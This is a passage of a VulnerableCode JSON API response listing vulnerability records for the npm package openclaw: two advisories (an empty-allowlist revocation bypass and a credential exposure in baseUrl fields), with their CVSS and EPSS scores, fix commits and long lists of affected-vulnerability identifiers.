"VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-35661", "GHSA-j4c9-w69r-cw33" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tk9h-nqrz-uugp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90995?format=api", "vulnerability_id": "VCID-tqzy-84fm-z7b6", "summary": "OpenClaw: Tlon settings empty-allowlist reconciliation bypassed intended revocation\n## Summary\nTlon settings reconciliation treated explicit empty allowlists as unset, which could silently undo an intended deny-all revocation.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `3cbf932413e41d1836cb91aed1541a28a3122f93`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/tlon/src/monitor/index.ts now honors explicit empty allowlists as authoritative deny-all configuration.\n- extensions/tlon/src/monitor/settings-helpers.test.ts ships regression coverage for explicit empty settings allowlists.\n\nThanks @zpbrent for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35649", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.10166", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.10155", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.10185", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35649" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/3cbf932413e41d1836cb91aed1541a28a3122f93", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:36Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/3cbf932413e41d1836cb91aed1541a28a3122f93" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-pw7h-9g6p-c378", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:36Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-pw7h-9g6p-c378" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35649", "reference_id": "CVE-2026-35649", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35649" }, { "reference_url": "https://github.com/advisories/GHSA-pw7h-9g6p-c378", "reference_id": "GHSA-pw7h-9g6p-c378", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-pw7h-9g6p-c378" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-settings-reconciliation-bypass-via-empty-allowlist", "reference_id": "openclaw-settings-reconciliation-bypass-via-empty-allowlist", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:15:36Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-settings-reconciliation-bypass-via-empty-allowlist" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "CVE-2026-35649", "GHSA-pw7h-9g6p-c378" ], "risk_score": 3.0, "exploitability": "0.5", "weighted_severity": "5.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tqzy-84fm-z7b6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91368?format=api", "vulnerability_id": "VCID-twsq-vfde-4fbf", "summary": "OpenClaw Exposes Credentials Embedded in baseUrl Fields via config.get and channels.status\n## Summary\nRead-scoped gateway snapshots could expose credentials embedded in channel baseUrl and related endpoint fields.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `f0202264d0de7ad345382b9008c5963bcefb01b7`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/channels/account-snapshot-fields.ts now strips URL userinfo from channel status snapshot fields.\n- src/config/redact-snapshot.ts now redacts credential-bearing baseUrl and httpUrl fields while preserving safe context.\n\nOpenClaw thanks @zpbrent for reporting.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/f0202264d0de7ad345382b9008c5963bcefb01b7", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/f0202264d0de7ad345382b9008c5963bcefb01b7" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-ppwq-6v66-5m6j", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-ppwq-6v66-5m6j" }, { "reference_url": "https://github.com/advisories/GHSA-ppwq-6v66-5m6j", "reference_id": "GHSA-ppwq-6v66-5m6j", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-ppwq-6v66-5m6j" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": 